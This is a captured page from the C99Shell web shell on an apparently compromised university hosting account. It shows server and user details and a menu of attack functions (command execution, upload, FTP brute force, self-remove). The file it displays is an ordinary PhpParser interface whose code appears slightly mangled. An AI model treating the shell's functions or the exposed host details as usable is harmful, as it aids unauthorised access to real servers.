!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/nikic/php-parser/lib/PhpParser/   drwxr-xr-x
Free 116.83 GB of 200.55 GB (58.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Node.php (1.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PhpParser;

interface 
Node
{
    
/**
     * Gets the type of the node.
     *
     * @return string Type of the node
     */
    
public function getType();

    
/**
     * Gets the names of the sub nodes.
     *
     * @return array Names of sub nodes
     */
    
public function getSubNodeNames();

    
/**
     * Gets line the node started in.
     *
     * @return int Line
     */
    
public function getLine();

    
/**
     * Sets line the node started in.
     *
     * @param int $line Line
     */
    
public function setLine($line);

    
/**
     * Gets the doc comment of the node.
     *
     * The doc comment has to be the last comment associated with the node.
     *
     * @return null|Comment\Doc Doc comment object or null
     */
    
public function getDocComment();

    
/**
     * Sets an attribute on a node.
     *
     * @param string $key
     * @param mixed  $value
     */
    
public function setAttribute($key$value);

    
/**
     * Returns whether an attribute exists.
     *
     * @param string $key
     *
     * @return bool
     */
    
public function hasAttribute($key);

    
/**
     * Returns the value of an attribute.
     *
     * @param string $key
     * @param mixed  $default
     *
     * @return mixed
     */
    
public function &getAttribute($key$default null);

    
/**
     * Returns all attributes for the given node.
     *
     * @return array
     */
    
public function getAttributes();
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0118 ]--